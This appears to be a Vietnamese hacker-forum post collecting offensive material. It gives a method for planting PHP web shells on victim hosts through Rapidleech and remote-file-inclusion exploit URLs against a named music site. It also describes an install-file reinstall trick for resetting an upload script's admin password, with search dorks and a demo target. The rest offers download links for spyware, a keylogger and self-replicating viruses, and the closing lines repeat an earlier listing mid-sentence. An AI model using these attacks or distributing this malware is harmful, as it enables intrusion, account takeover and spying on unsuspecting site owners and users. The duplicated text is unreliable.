How to: Mọi người kiếm con shell up lên chỗ rapidshare sau đó copy cái link lại, tìm cái site nào có dùng rapidleech paste cái link rapidshare ở trên vào chỗ download để transfer về host của tụi nó. Xong phim, có shell trên host tụi nó . Thực ra ở đây ko nhất thiết là phải up shell lên rapidshare, ví dụ mọi người muốn transfer shell php về host victim thì kiếm cái host asp (ko support php) up con shell php lên rùi transfer thoải mái. Nhiều khi thằng victim nó cẩn thận nó check file type, cứ gặp file php là nó tự động del thì vẫn có cách để chơi nó , mọi người tìm hiểu thêm Longnhi(HCE) Source music nguoiquangnam.de Remote file inclusion Vulnerability By longnhi - HCEGroup.net music_includes/new_songs.php Code: music_includes/new_songs.php?music_include_dir= music_includes/search.php Code: music_includes/search.php?code=hack&type=song&music_include_dir= music_includes/search.php?code=hack&type=singer&music_include_dir= music_includes/search.php?code=hack&type=extension&music_include_dir= file_includes/search_member.php Code: file_includes/search_member.php?type=theoten&music_include_dir= file_includes/search_member.php?type=tenthat&music_include_dir= file_includes/search_member.php?type=nickyahoo&music_include_dir= By longnhi - HCEGroup.net File bị lỗi /music_includes/new_songs.php Code: Đoạn code bị lỗi include("$music_include_dir/thongbao.php"); Khai thác /music_includes/new_songs.php?music_include_dir= /music_includes/search.php Code: /search.php?os=hack&type=hack&music_include_dir= /search.php?type=song&music_include_dir= /search.php?type=singer&music_include_dir= /search.php?type=extension&music_include_dir= Uploadscript, v2.72 script name: Uploadscript v2.72 script's homepage: _http://www.coder- world.de/cw/seite__pagewebdesignupload.html cái uploader này hôm bữa đi check tự nhiên thấy ! cái script này thằng coder nó viết nhưng mà nó quên 1 phần là không check cái file install còn xuất hiện hay không ! do dó khi mà instal xong thì victim nó sẽ không xóa file này ! mình có thể lợi dụng chỗ này mà re-install lại -> reset pass admin -> chui vào acp ! search google: http://www.google.com/search?hl=en&q oogle+S earch http://www.google.com/search?q=Uploa arch&hl=en&lr= demo: http://blackfilez.com/install.cgi black_hat_cr(HCE) ZMedia All version Ai có mặt bên Free Code chắc cũng biết cái source Nó đang nổi đình đám bên đó Lần trước check thử thì thấy lỗi tùm lum , ku Admin chơi dùng Java để lấp liếm lại Bữa nay lên chẹck bản mới nhất cũng thấy còn 1 lỗi tuy không nặng nhưng vẫn xài được Cái này là XSS nhá : Trích: VTYPMOD=2; VSPELL=1; VONOFF=1; PHPSESSID=057ff26cbe5aca1909facf67ebbfbd9d http://vietnam-network.net/media/index.php No Face(HCE) [Trojan]Spynet Với spynet thì phần mềm gián điệp này hoạt động rất hiệu quả , đặc biệt trong môi trường Xp , bạn hãy thữ test , sau khi setup , thường thì keylogger sẽ nằm gọn trong systems32 nhưng spynet thì ko ? có mà pro mới search đc ~ nó có chức năng invisible tuyệt vời ~ các bạn down về dùng thử nhé http://www.securityfocus.com/data/tools/spynet312.exe Jps 7.0 http://www.freewebtown.com/giothoi/jps1.7.zip cách dùng tượng tự magic YeuEmDaiKho(HCE) 16 Hard Virus Found Monad.Candela-family - Very first Monad viruses - Infects Command Shell Files for Mcft Windows Vista (Codename: Longhorn) - Overwriter - Prepender - Appender - EPO-infector - Cross-Infector *http://spth.host.sk/monad.zip SPTH-OS 2.0 - Very first Bootsectorvirus for CD-ROMs - Works on CD-ROMs and diskettes - Own FAT32 system support (no INT hooking) - FAT12 .IMG files infection - ISO-9660 El Torito .ISO file infection - Infects all files in Root_Directory of 1st Partition on HD - Size: 3 Sector *http://spth.host.sk/spthos2.0.zip SPTH-OS 1.0 - Bootsectorvirus - Own FAT12 system support (no INT hooking) - Bootsectorinfection of FAT12 .IMG files - Infects all files in Root_Directory of current Disk - Size: 1 Sector *http://spth.host.sk/spthos1.0.zip Ruby.Paradoxon - World's very first Ruby virus - Prepender - 655 bytes *http://spth.host.sk/Ruby.Paradoxon.zip Menuet/COM.Tristesse - Multi-platform infector - Menuet (32bit) -> Menuet (32bit - prepending) - Menuet (32bit) -> COM (16bit - appending) - COM (16bit) -> COM (16bit - appending) - COM (16bit) -> Menuet (32bit - prepending) - Fully 16/32bit assembler written - KAV warning avoiding via by-hand DOS function encryption *http://spth.host.sk/Menuet.Tristesse.zip Menuet.Oxymoron - World's very first Menuet virus - Prepender - Fully 32 bit assembler written . infection - ISO-9660 El Torito .ISO file infection - Infects all files in Root_Directory of 1st Partition on HD - Size: 3 Sector *http://spth.host.sk/spthos2.0.zip SPTH-OS 1.0 - Bootsectorvirus